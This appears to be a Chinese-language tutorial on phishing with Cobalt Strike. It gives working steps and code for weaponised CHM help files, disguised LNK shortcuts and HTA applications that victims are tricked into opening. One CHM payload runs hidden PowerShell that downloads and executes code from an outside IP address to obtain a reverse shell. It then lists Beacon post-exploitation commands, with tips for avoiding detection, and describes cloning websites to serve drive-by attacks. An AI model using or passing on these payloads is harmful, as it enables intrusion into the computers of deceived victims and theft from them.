CHM釣魚
CHM介紹
CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內容以類似數據庫的形式編譯儲存。
利用CHM釣魚主要原因是因為該文檔可以執行cmd命令
這里制作CHM需要用到一個工具就是 EasyCHM
CHM制作過程:
創建一個文件夾(名字隨意),在文件夾里面再創建兩個文件夾(名字隨意)和一個index.html文件,在兩個文件夾內部創建各創建一個index.html文件。
先將下列代碼復制到根文件夾中的index.html中。
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>
打開我們的EasyCHM工具
后點擊新建
然后導入自己創建的文件夾,點擊確定后再點擊編譯,在彈出的對話框中點擊生成CHM按鈕
它會給你生產一個CHM文件,給別人發過去,一旦點擊就會給彈出計算機
生產釣魚文件
啟動Cobalt Strike,點擊attacks——>web Drive by——>scripted web Delivery在彈出的對話框中將type類型設置為powershell然后單擊launch按鈕
再用代碼將上面創建的根文件夾中的index.html代碼中的calc.exe替換掉。
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.209.151:81/aa'))"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>
生產CHM發送給別人,點擊后獲得反彈的shell
LNK釣魚
lnk文件是用於指向其他文件的一種文件。這些文件通常稱為快捷方式文件,通常它以快捷方式放在硬盤上,以方便使用者快速的調用。
lnk釣魚主要將圖標偽裝成正常圖標,但是目標會執行shell命令。
先做個簡單的powershell生產圖標:
創建個txt文本寫入下面代碼然后改文件后綴名為.ps1。
cmd /c calc.exe
右鍵文件powershell運行后會彈出計算器
釣魚方法:
首先通過Cobalt Strike的attacks——>web Drive by——>scripted web Delivery
tpye類型為powershell,然后單機launch。生產代碼。
還記的上面做的那個簡單的powershell么,后綴改回txt,將生成的代碼替換掉calc.exe
將下面的powershell代碼寫入.ps1文件,右鍵運行powershell。
$file = Get-Content "test.txt" $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("test.lnk") $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" $Shortcut.Arguments = ' '+ $file $Shortcut.Save()
生成test.lnk文件,而且圖標改了(powershell執行文件要和test.txt要在一個目錄下,這個圖標所在位置就在%SystemRoot%\System32\Shell32.dll目錄下)
后將test.lnk發送給他人,獲得反彈shell。
HTA釣魚
HTA是HTML Application的縮寫,直接將HTML保存成HTA的格式,是一個獨立的應用軟件。
HTA雖然用HTML、JS和CSS編寫,卻比普通網頁權限大得多,它具有桌面程序的所有權限。
就是一個html應用程序,雙擊就能運行。
Cobalt Strike,attacks——>packages——>HTML application
選擇powershell然后單機generate,選擇保存路徑。
將生成的.hta文件發送給別人,點擊后獲得shell
后滲透階段
相信你已經能拿到一個beacon的shell了。
下面是一些基本的使用命令,但是cs監聽器對中文支持並不友好,會對中文產生亂碼。
help 查看beacon shell所有內置命令幫助,如果想查看指定命令的用法,可以這樣,eg: help checkin
note 給當前目錄機器起個名字, eg: note beacon-shell
cd 在目標系統中切換目錄,注意在win系統中切換目錄要用雙反斜杠,或者直接用'/' eg: cd c:\\
mkdir 新建目錄, eg: mkdir d:\\beacon
rm 刪除文件或目錄, eg: rm d:\\beacon
upload 上傳文件到目標系統中
download 從目標系統下載指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel 取消下載任務,比如,一個文件如果特別大,下載可能會非常耗時,假如中途你不想繼續下了,就可以用這個取消一下
shell 在目標系統中執行指定的cmd命令, eg: shell whoami
getuid 查看當前beacon 會話在目標系統中的用戶權限,可能需要bypassuac或者提權
pwd 查看當前在目錄系統中的路徑
ls 列出當前目錄下的所有文件和目錄
drives 列表出目標系統的所有分區[win中叫盤符]
ps 查看目標系統當前的所有的進程列表
kill 殺掉指定進程, eg: kill 4653
sleep 10 指定被控端休眠時間,默認60秒一次回傳,讓被控端每10秒來下載一次任務,實際中頻率不宜過快,容易被發現,80左右一次即可
jobs 列出所有的任務列表,有些任務執行時間可能稍微較長,此時就可以從任務列表中看到其所對應的具體任務id,針對性的清除
jobkill 如果發現任務不知是何原因長時間沒有執行或者異常,可嘗試用此命令直接結束該任務, eg: jobkill 1345
clear 清除beacon內部的任務隊列
checkin 強制讓被控端回連一次
exit 終止當前beacon 會話
ctrl + k 清屏
有些可能會觸發敏感api導致防護報警,另外進程注入,被控端可能感到非常明顯的卡頓,工具也有許多不完善的地方
網站克隆
Cobalt Strike還能夠實現網站克隆
cotalt strike能夠快速復制目標網站前端頁面,並且復制相識度極高
cotalt strike同時還可以在復制的網站中插入惡意代碼,如果本地瀏覽器帶有漏洞的用戶,可以直接控制目標機器。
點擊attacks——>Web Drive-by——>Clone site
- Clone URL:克隆目標網站的URL(如果網站不是80端口的話域名后得跟上端口號。)
- 注意問題:URL需要添加http協議和端口(81)
- Local URL:本地克隆路徑
- Local Host:本地主機IP
- Local Port:本地端口
- Attack:克隆后目標網站執行腳本,如:flash漏洞
